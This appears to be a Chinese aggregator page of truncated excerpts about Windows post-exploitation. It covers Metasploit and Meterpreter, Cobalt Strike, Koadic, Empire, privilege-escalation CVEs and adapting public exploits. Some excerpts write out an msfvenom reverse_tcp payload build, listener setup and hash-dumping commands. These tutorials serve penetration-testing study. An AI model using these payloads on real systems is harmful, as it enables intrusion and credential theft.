Windows后渗透】的更多相关文章

网上公开的exp代码,选择可信赖的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......) 类unix坏境下编译 返回地址和环境不符合 反弹shell硬编码了回链IP地址 缓冲区偏移量与我们的环境不符 目标IP硬编码 如下测试 查找slmail的exp 把exp复制到当前目录下进行修改测试 vim 638.py vim 643.c 避免有害的exp,避免一锤子测试,满足不同环境需要,了解漏…
My 命令行下收集主机信息 使用wmic识别安装到系统中的补丁情况: wmic qfe get description,installedOn 识别正在运行的服务: sc query type= service 识别开机启动的程序,包括路径: net start wmic startup list full ping探测存活主机 D:\>for /L %I in (100,1,254) DO @ping -w 1 -n 1 10.18.180.%I | findstr "TTL="…
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法. 贴心提示:为提高教学效果,文章内的配图大部分是GIF,担心流量的知友请尽量在WIFI环境下观看! 目录 第一节 初识Met…
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163.132 WindowsXP机器IP:192.168.163.134 如果以及获取了目标服务器的控制权之后,如何扩大战果? 所以我们首先需要一个已经获取了控制权的目标机器 我直接用msfvenom工具来生成:这里的参数我在前面介绍过了,不再多说 然后我利用Apache传给WindowsXP机器: OK…
生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.ex 传到测试机执行后得到反弹shell msfconsole msf > use multi/handlermsf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(multi/handl…
火眼推出Windows免费渗透测试套件,包含140多款工具 2019年3月28日,火眼发布了一个包含超过140个开源Windows渗透工具包,红队渗透测试员和蓝队防御人员均拥有了顶级侦察与漏洞利用程序集.该工具集名为“CommandoVM”. 安全工作者在对系统环境进行渗透测试时常常会自己配置虚拟机,如果是Linux的话还好,还有Kali Linux可以用.但是碰上Windows环境就惨了,往往配置虚拟机环境就要好几个小时.一边要维护自定义的虚拟机环境,一边还要时常升级集成的工具套件,花费的时间…
0x00 整理的一些后渗透提权需要用到的一些漏洞,后渗透提权的时候可以看一下目标机那些补丁没打,再进行下一步渗透提权. 0x01 CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019)CVE-20…
0x01 简介 Cobalt Strike集成了端口转发.扫描多模式端口监听Windows exe木马,生成Windows dll(动态链接库)木马,生成java木马,生成office宏病毒,生成木马捆绑钓鱼攻击,包括站点克隆目标信息获取java执行浏览器自动攻击等等. 是一个鼎鼎大名的后渗透集成平台! cobalt strike采用的是服务器端+客户端的模式,可以支持多客户端同时进行工作的效果. 本教程将包含一个服务器端以及一个客户端. 本教程中服务器端为debian:客户端为windows7…
在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础 记录一下关于meterpreter 信息收集的使用 环境: kali linux 192.168.190.141 xp靶机 192.168.190.140 生成木马 监听反弹shell上线 信息收集: ============================================================================================================…
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目标处于一个内网环境中,那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试,更全面地挖掘系统中存在的安全隐患. 本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用MSF进行后渗透测试. 一.获取Meterpreter会话 Meterpreter 是msf的一个payload,目标执行之后,…
koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进行大部分的操作,其核心兼容性支持WindowsXP到Window 10的环境中使用,Koadic的相比于其他的后门程序来说更轻便,该工具通过调用系统的一些命令来完成Shell的反弹工作,因为调用的是系统的模块,所以天生免杀.你只需要在目标主机上执行一条命令,即可完全控制目标主机,该工具在圈内有一个别…
前言: 在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧. 首先把项目克隆到本地: 项目地址 https://github.com/zerosum0x0/koadic.git 然后解压,如果你要安装到你指定的目录就先cd到那个目录在下载,我是复制到那了,所以我解压.如下图 运行koadic cd koadic-master/           //cd到软件目录 sudo ./koadi…
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令.脚本及使用方式.包含信息收集.提权.注册表操作.令牌操纵.哈希利用.后门植入等. 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有…
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目标处于一个内网环境中,那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试,更全面地挖掘系统中存在的安全隐患. 本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用MSF进行后渗透测试. 一.获取Meterpreter会话 Meterpreter 是msf的一个payload,目标执行之后,…
一.前言 Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学.安全通信和灵活的架构之上.Empire实现了无需powershell.exe就可运行PowerShell代理的功能.快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中 二.empire使用详解 1.Empire 的安装 git clone https://github.com/EmpirePro…
Cobalt Strike安装 系统要求 Cobalt Strike要求Java 1.8,Oracle Java ,或OpenJDK . 如果你的系统上装有防病毒产品,请确保在安装 Cobalt Strike 前将其禁用 #团队服务器 Cobalt Strike 分为客户端组件和服务器组件.服务器组件,也就是团队服务器,是 Beacon payload 的控制器,也是 Cobalt Strike 社会工程功能的托管主机.团队服务器还存储由 Cobalt Strike 收集的数据,并管理日志记录.…
在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详细信息 run hashdump #导出密码的哈希 load kiwi #加载mimikatz ps #查看目标主机进程信息 pwd #查看目标当前目录(windows) getlwd #查看目标当前目录(Linux) search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的…
实验目的 学习利用Meterpreter后渗透阶段模块来开启靶机远程桌面 实验原理 利用Meterpreter生成木马,利用木马控制靶机进行远程桌面的攻击 实验内容 利用Meterpreter后渗透阶段模块来开启靶机远程桌面 实验步骤 渗透机H007003010kali账号密码:root/toor 靶机H007003010win2003账号密码Administrator/123456 Meterpreter Shell的生成过程此处不再赘述,详情可以查看课程Meterpreter核心命令 1.针…
问题: 原本是:双系统(linux和windows),后来换windows版本覆盖了grub2 解决方法: 进入windows后下载并安装EasyBCD并添加grub2的选项,重启看见了熟悉的启动项,进入linux系统重新安装grub2就可以了 grub-install /dev/sda ps:如果你只有一个磁盘,并且为sda就行…
装了双系统(Windows和Linux)的机器重新安装Windows后会导致Linux的引导丢失而无法进入原先的Linux系统[其原因是Windows会覆盖原先MBR中的Linux的BootLoader-GRUB].这种情况可以通过修复引导而重新找回Linux. 以Ubuntu14.04为例:首先找到一张Linux的安装盘,放入光驱后重启电脑.进入BIOS让电脑从光盘启动,然后进入Live CD模式(如:电脑从Ubuntu安装盘启动后,点击"试用Ubuntu",如若此时进入图形界面较慢…
网络漏洞攻击工具 Metasploit 先msfupdate升级: 然后选择msfconsole: 接下来: set LHOST 本机IP地址 setLPORT setg PAYLOAD windows/shell/reverse_tcp setg RHOST 目标IP地址 setg port set target 随意数字 exploit 这样就可以反弹一个cmd shell了. 密码破解 Hydra 多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,s…
常规的,从web业务撕开口子url:bit.tcl.comgetshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshell,拿到shell,权限很高,system看看网卡信息 只有一块网卡,处于10.4.22的私网地址在这里,如果我们想要通过这台机器对内网进行渗透,首要工作就是进行内网探测,介绍几个方法0x00如果你只是需要对内网的业务主机进行渗透,那么可以优先查看一下hosts,针对hosts中的主机针对性渗透0x01如果想要对整个C段主机进行渗透…
EggShell是一款基于Python编写的iOS和macOS的后渗透利用工具.它有点类似于metasploit,我们可以用它来创建payload建立侦听.此外,在反弹回的session会话也为我们提供了许多额外的功能.例如文件的上传/下载,拍照,定位,shell命令执行,权限维持,提权,密码检索等.在服务器通信方面EggShell则采用了128位AES端到端的加密,并同时能够处理多个客户端程序.这是一个概念验证工具,适用于在你自己的机器上使用.有关更多详细信息请访问:http://lucasj…
 xss平台搭建 1.申请一个云主机来进行建站:149.28.xx.xx 2.安装lnmp: wget http://soft.vpser.net/lnmp/lnmp1.5.tar.gz -cO lnmp1.5.tar.gz && tar zxf lnmp1.5.tar.gz && cd lnmp1.5 && ./install.sh lamp  如果想安装lanmp,就把最后的“lamp”修改为“lanmp” 如果安装lamp建议安装如下图所示版本配置:…
Linux重装为Windows后读取原EXT类型数据盘 1 2 3 4 分步阅读 Windows的文件系统通常使用NTFS或者FAT32格式,而Linux的文件系统格式通常是EXT系列.当操作系统从Linux重装为Windows后,操作系统类型发生了变化,而数据盘仍然是原来的格式,重装后的系统可能出现无法访问数据盘文件系统的情况.可在重装后的Windows云服务器上执行以下操作读取原Linux系统下数据盘数据: 工具/原料   windows LINUX 电脑 DiskInternals Lin…
Metasploit 高阶之后渗透 01信息收集 应用场景: 后渗透的第一步,更多地了解靶机信息,为后续攻击做准备. 02进程迁移 应用场景: 如果反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档而产生的,那么对方一旦关闭掉程序,我们获取到的meterpreter会话就会随之关闭,所以把会话进程注入到其他常见的系统进程如explorer.exe是一个好方法 03.内网扫描 应用场景: 如果攻击者通过某个漏洞入侵了一个系统,并取得了meterpreter终端,但这台机器…
Enumy是一款功能强大的Linux后渗透提权枚举工具,该工具是一个速度非常快的可移植可执行文件,广大研究人员可以在针对Linux设备的渗透测试以及CTF的后渗透阶段利用该工具实现权限提升,而Enumy运行之后将能够帮助研究人员枚举出目标设备中常见的安全漏洞. 前言 哪些人应该使用Enumy 1.渗透测试人员,可以在目标设备上运行Enumy,并报告发现的安全问题: 2.CTF玩家可以利用Enumy来识别他们原本可能会错过或忽略的东西: 3.想识别本地设备中安全漏洞的话,同样可以使用Enumy:…
0x01 简介 该后门的基本原理是使用Windows 的远程管理管理服务WinRM,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门. 具体细节信息请参考:https://paper.seebug.org/1004/ 0x02 复现 2.1 环境信息 此次的后门连接是需要目标服务器的高权用户的明文密码的,需要先抓取相应的明文密码才可部署后门: 首先查看目标服务器时候能够正常使用WinRM服务: 在Windows 2012以上的服务器操作系统中,WinRM服务默认启动并监听了…
随着计算机与网络的普及,信息安全越来越成为人们所普遍关心的大事.密码的渗透与反渗透在此领域表现的愈演愈烈.本文深入分析了各个版本Windows密码的特点,尤其是针对windws2K/XP安全性提高的情况下,提出了获取windows密码的关键技术及方法.并进一步分析了windows钩子(Hook)和内存映像文件(MMF)的技术细节.在基于MMF的核心类CIPC中为钩子句柄在内存中的共享提供了方法,并且解决了线程间的同步问题.然后深入讨论了WM_COPYDATA消息的特点.接着分析了实例程序重要代码…
1.安装 1.1.系统环境: Debian系Linux:例如Ubuntu和Kali(本文使用Kali作为环境) 1.2.安装命令: 安装最后需要输入用户名.密码 wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip unzip Empire-master.zip cd Empire-master cd setup/ ./install.sh 1.3.测试启动 root@kali:~# cd Em…